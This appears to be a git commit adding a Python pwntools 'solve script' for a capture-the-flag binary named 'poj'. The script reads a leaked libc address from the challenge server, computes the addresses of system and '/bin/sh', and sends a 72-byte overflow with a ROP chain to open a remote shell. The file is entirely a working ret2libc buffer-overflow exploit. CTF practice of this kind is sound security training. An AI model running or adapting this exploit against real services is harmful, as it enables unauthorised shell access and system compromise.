solve script

2024-10-22 12:18:53 +03:00
parent d207af5521
commit 3083d5bf8a
1 changed files with 30 additions and 0 deletions
@@ -0,0 +1,30 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./poj", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1003)
+
+# leak
+r.recvuntil(b": ")
+write = int(r.recvline().strip(), 16)
+log.info("write: 0x%lx", write)
+libc_base = write - 0xff4d0
+log.info("libc: 0x%lx", libc_base)
+system = libc_base + 0x4dab0
+log.info("system: 0x%lx", system)
+sh = libc_base + 0x197e34
+
+# gadgets
+pop_rdi = libc_base + 0x28215
+
+# pop
+buf = b"A"*72
+buf += p64(pop_rdi)
+buf += p64(sh)
+buf += p64(pop_rdi+1)
+buf += p64(system)
+r.sendline(buf)
+
+r.interactive()